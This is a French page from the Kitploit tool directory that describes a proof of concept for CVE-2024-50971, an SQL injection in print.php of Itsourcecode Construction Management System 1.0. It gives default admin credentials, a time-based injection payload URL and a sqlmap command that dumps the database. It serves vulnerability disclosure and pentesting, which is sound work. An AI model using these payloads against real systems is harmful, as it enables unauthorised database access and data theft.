Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50971 — Preuve de concept d'une vulnérabilité d'injection SQL dans Itsourcecode Construction Management System 1.0, avec étapes d'exploitation et intégration de SQLMap pour l'extraction de base de données. | Kitploit
Outils/GitHubGitHub/akhlak2511/cve-2024-50971
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité des Bases de Données
GitHubakhlak2511/cve-2024-50971

CVE-2024-50971

Preuve de concept d'une vulnérabilité d'injection SQL dans Itsourcecode Construction Management System 1.0, avec étapes d'exploitation et intégration de SQLMap pour l'extraction de base de données.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50971

Description

Une vulnérabilité d'injection SQL dans print.php de Itsourcecode Construction Management System 1.0 permet à des attaquants distants d'exécuter des commandes SQL arbitraires via le paramètre map_id.

Type de vulnérabilité

Injection SQL

Éditeur du produit

Itsourcecode

Code de base du produit affecté :

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Composant affecté :

Le Itsourcecode Construction Management System v1.0 est vulnérable à l'injection SQL via le paramètre map_id dans la page print.php.

Vecteurs d'attaque :

  1. Configurez l'application localement, créez un compte et connectez-vous avec les identifiants admin : admin:admin
  2. Accédez à l'URL suivante dans votre navigateur : http://localhost/monitoring_system/print.php?map_id=67
  3. Injectez une charge utile SQL : Modifiez le paramètre map_id dans l'URL pour inclure une charge utile d'injection SQL basée sur le temps. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
  4. Observez la réponse de l'application : La page devrait prendre sensiblement plus de temps (15 secondes) à charger si l'injection réussit, confirmant que le paramètre map_id est vulnérable à l'injection SQL.
  5. Utilisez maintenant l'outil SQLMap pour une exploitation plus poussée et le dump des bases de données avec la commande ci-dessous : sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast

Références :

  1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Télécharger l’outil